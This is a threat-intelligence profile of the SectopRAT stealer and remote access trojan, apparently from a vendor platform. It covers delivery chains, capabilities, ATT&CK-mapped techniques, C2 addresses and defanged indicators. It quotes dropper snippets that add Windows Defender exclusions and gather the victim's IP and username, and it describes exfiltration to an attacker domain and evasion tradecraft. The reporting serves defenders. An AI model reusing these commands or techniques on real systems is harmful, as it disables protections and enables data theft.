SectopRAT
SectopRAT is a .NET-based information stealer and remote access trojan, also tracked in the provided reporting as ArechClient and Arechclient2, and described as active since at least 2019. Across the cited campaigns it is consistently used as a final payload or secondary payload delivered by other malware and loaders including ACRStealer, StealC, CastleLoader, BabaDeda Loader, GHOSTPULSE, HiJack Loader/IDAT Loader, NetSupport RAT, and ClickFix-driven chains. Delivery vectors mentioned in the content include malicious PowerShell droppers, fake browser or software update lures, fake Google verification and CAPTCHA/ClickFix pages, trojanized installers, signed malicious MSIX packages, ZIP archives, DLL side-loading chains, compromised WordPress sites, malvertising, SEO poisoning, and fraudulent Google Ads redirects.
The malware is described as combining stealer and RAT functionality. Reported capabilities include theft of browser credentials and cookies, browser session hijacking, theft of email client data, cryptocurrency wallet theft, harvesting of application credentials and installed software information, language discovery, storage enumeration, process injection, privilege manipulation, PowerShell execution, persistence, webcam access, and keylogging. Reporting also notes that RAT-class use of SectopRAT can enable hands-on-keyboard activity such as discovery, lateral movement, and persistence. In one analyzed chain, the final SectopRAT payload targeted browser credentials, email clients, and cryptocurrency wallets.
Observed tradecraft around SectopRAT delivery includes reflective .NET assembly loading, AES-256-CBC decryption, Donut shellcode injection, direct NTDLL syscalls, AMSI bypass by patching the CLR amsi.dll reference in memory, fiber-based shellcode execution, process doppelgänging, DLL side-loading, in-memory PE loading, Windows Defender exclusions, reconnaissance, exfiltration, and cleanup/self-deletion. One PowerShell delivery script downloaded SectopRAT from fancysunshine[.]top, added Defender exclusions for C:\ and selected processes, queried ifconfig.me/ip, collected the USERNAME value, checked for a scheduled task named MSSecurity, exfiltrated result.txt to upload.php on the same domain, and deleted artifacts afterward.
The content links SectopRAT to multiple criminal ecosystems and campaigns. It was observed in StealC-linked activity by Proofpoint and IBM X-Force; in TAG-150/GrayBravo infrastructure and delivery chains documented by Recorded Future and Breakglass Intelligence; in ClearFake campaigns using EtherHiding and BNB Smart Chain testnet smart contracts; in GrayCharlie/SmartApeSG compromises of U.S. law firm WordPress sites; and in Slack-themed malware campaigns. Breakglass Intelligence assessed shared infrastructure between ACRStealer and SectopRAT as strong evidence of a single operator running both the Go-based ACRStealer and the .NET-based SectopRAT.
High-confidence infrastructure and indicators directly mentioned in the content include fancysunshine[.]top and its path /s8dj3bh9w877/ for payload delivery and exfiltration; a SectopRAT sample observed by Elastic retrieving C2 information from Pastebin and connecting to 195.201.198[.]179:15647; TAG-150-associated SectopRAT C2 communications on TCP ports 15647, 15747, 15847, 15947, 14367, and 9000; and Breakglass-identified SectopRAT C2 servers 94[.]26[.]106[.]216, 89[.]110[.]107[.]177, 144[.]31[.]90[.]139, and 194[.]150[.]220[.]218, with 94[.]26[.]106[.]216:9000 responding on /wbinjget and /wmglb. Additional reporting places SectopRAT-related infrastructure within broader malicious hosting clusters such as AS202412/OMEGATECH and notes overlap with AmateraStealer and NetSupport RAT infrastructure.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
These malware families are frequently observed as initial infection vectors that deliver a wide range of secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT...
The PowerShell dropper ( bruce.php ) unpacks through five stages -- XOR decryption, reflective .NET assembly loading, AES-256-CBC decryption, Donut shellcode injection via raw NTDLL syscalls -- before deploying the final SectopRAT info-stealer targeting browser credentials, email clients, and cryptocurrency wallets.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Initial Access
1 technique
Initial Access
ClearFake spreads by compromising legitimate websites and injecting hidden JavaScript code into their pages. Victims do not need to do anything suspicious to get infected. Simply visiting a tampered legitimate site can trigger the malware’s multi-stage delivery chain.
Execution
6 techniques
Execution
The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...
During routine malware analysis, I discovered a PowerShell-based dropper script being delivered from a malicious C2 domain... This script disables security controls, fetches 2 payloads (SectopRAT, HiJack Loader), exfiltrates data, and removes all traces of its execution.
Stage 3 -- Legitimate Python Binary : The ZIP extracts to a directory containing FNPLicensingService.exe -- which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe... Stage 4 -- Obfuscated Python Loader : chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
Persistence
2 techniques
Persistence
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
8 techniques
Stealth
MITRE ATT&CK Mapping ... Defense Evasion Software Packing T1027.002 Reversed Base64 + Zlib compression
MITRE ATT&CK Mapping ... Defense Evasion Masquerading T1036.005 FNPLicensingService.exe (renamed pythonw.exe)
Before exiting, the malware removes: All downloaded ZIPs and folders The exfiltrated result file Itself via a helper script deleter.ps1
The chrome_100_percent.pak file decodes through three distinct layers... reverse string, base64 decode, zlib decompress ... rolling XOR decrypts embedded SectopRAT PE
Architecture gate: Forces relaunch in 32-bit PowerShell via $env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe... MITRE ATT&CK Mapping... T1218 32-bit PowerShell relaunch via SysWOW64.
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Credential Access
3 techniques
Credential Access
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
Discovery
5 techniques
Discovery
The malware collects the victim’s external IP address... $externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"
The malware collects the victim’s external IP address and username... $username = $env:USERNAME
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Collection
6 techniques
Collection
Stage 9: Data Theft Browser credential/cookie theft Cryptocurrency wallet theft Application credential harvesting
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
SectopRAT... Email client harvesting -- Outlook and Thunderbird data extraction.
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
Command and Control
4 techniques
Command and Control
In SectopRAT samples, the malware first reaches out to Pastebin to retrieve the command and control address.
Stage 8: C2 Communication HTTP to 94[.]26[.]106[.]216:9000 /wbinjget -- heartbeat ... /wmglb -- payload/config download
Exfiltration
1 technique
Exfiltration
Other
1 technique
Other
The script attempts to evade detection by creating Windows Defender exclusions for the entire C drive and two known processes often abused in malware campaigns. Add-MpPreference -ExclusionPath $folderPath Add-MpPreference -ExclusionProcess $processName Add-MpPreference -ExclusionProcess $processName1
IOCs tracked for this family
152 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
40 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
SectopRAT is listed as a malware family delivered in StealC-linked activity.
A remote access trojan observed as a payload in StealC-related infection chains.
SectopRAT was observed as a payload delivered in StealC-related operations.
A remote access trojan delivered via DLL side-loading in the BabaDeda Loader campaign.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.